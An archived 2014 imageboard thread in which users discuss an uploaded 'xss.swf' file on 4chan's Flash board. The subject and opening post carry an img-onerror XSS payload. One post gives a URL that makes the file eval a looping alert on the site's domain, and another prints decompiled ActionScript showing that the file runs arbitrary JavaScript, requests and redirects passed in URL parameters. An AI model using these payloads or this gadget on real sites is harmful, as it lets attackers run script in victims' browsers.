swfchan: Resource JFBYP87

This is resource JFBYP87, an Archived Thread.
Discovered:
11/5 -2014 12:11:19
Ended:
11/5 -2014 16:17:44
Checked:
11/5 -2014 17:35:55
Original location: http://boards.4chan.org/f/thread/2380367
Recognized format: Yes, thread post count is 16.
Discovered flash files: 1
xss.swf
[W] [I] | WIKI
File: xss.swf-(5 KB, 550x400, Other)
[_] "><img src=x onerror=alert(1)> LALKA"><img src=x onerror=alert(1)> 05/11/14(Sun)05:05 No.2380367

  "><img src=x onerror=alert(1)>

>> [_] Anonymous 05/11/14(Sun)05:29 No.2380380

  >>2380367
  I am afraid to click.

>> [_] Anonymous 05/11/14(Sun)05:35 No.2380382

  >>2380380
  Someone click and post results if possible

>> [_] Anonymous 05/11/14(Sun)05:37 No.2380384

  >>2380382
  Here goes.

>> [_] Anonymous 05/11/14(Sun)05:38 No.2380387

  >>2380384
  Just some instructions on how to link things.

>> [_] Anonymous 05/11/14(Sun)05:40 No.2380389

  I used the embed button out of fear. Nothing happened, and scans seems to indicate it didn't do
  anything either.
  It was saying repeatedly "lol! cool :3" on another /f/ thread.

>> [_] Anonymous 05/11/14(Sun)05:43 No.2380391

  >>2380389
  Open it with Google Chrome, it displays some kind of instructions.

>> [_] Anonymous 05/11/14(Sun)05:44 No.2380393

  >>2380391
  >>2380387
  Honestly?

>> [_] Anonymous 05/11/14(Sun)05:45 No.2380394

  >>2380393
  Yup.

>> [_] Anonymous 05/11/14(Sun)05:47 No.2380395

  http://i.4cdn.org/f/xss.swf?a=eval&c=while(true){alert(%22hello!%20:3%22)}

>> [_] Anonymous 05/11/14(Sun)05:53 No.2380397

  Wow, okay. That's... neat.

>> [_] Anonymous 05/11/14(Sun)07:37 No.2380438

  >>2380391
  Correction: it displays instructions in an alert window.

>> [_] Anonymous 05/11/14(Sun)07:42 No.2380441

  Decompiled. It's an xss vulnerability tester. Nothing bad here.

  public function attack(param1) {
  var _loc_2:URLLoader = null;
  var _loc_3:String = null;
  switch(param1){
  case "location":{
  navigateToURL(new URLRequest(this.cmd), "_self");
  break;
  }
  case "open":{
  navigateToURL(new URLRequest(this.cmd), "_blank");
  break;
  }
  case "get":{
  _loc_2 = new URLLoader(new URLRequest(this.cmd));
  _loc_2.addEventListener(Event.COMPLETE, this.get_complete);
  _loc_2.addEventListener(SecurityErrorEvent.SECURITY_ERROR, this.get_sec_error);
  break;
  }
  case "eval":{
  ExternalInterface.call("eval", this.cmd);
  break;
  }

>> [_] Anonymous 05/11/14(Sun)07:43 No.2380442

  >>2380441
  default:{
  _loc_3 = "a(action) - c(cmd)\n";
  _loc_3 = _loc_3 + "-----------------\n";
  _loc_3 = _loc_3 + "1. location to url: xss.swf?a=location&c=http://www.google.com/\n";
  _loc_3 = _loc_3 + "2. open url to new window: xss.swf?a=open&c=http://www.google.com/\n";
  _loc_3 = _loc_3 + "3. http request to url: xss.swf?a=get&c=http://www.google.com/\n";
  _loc_3 = _loc_3 + "4. eval js codz: xss.swf?a=eval&c=alert(document.domain)\n";
  _loc_3 = _loc_3 + "-----------------\n";
  _loc_3 = _loc_3 + "by evilcos@gmail.com";
  ExternalInterface.call("alert", _loc_3);
  break;
  break;
  }
  }
  stop();
  return;
  }

>> [_] Anonymous 05/11/14(Sun)08:05 No.2380449

  it opened a gmail window
  weird

>> [_] Anonymous 05/11/14(Sun)09:14 No.2380486

  >>2380441
  What's did you use for that if you don't mind?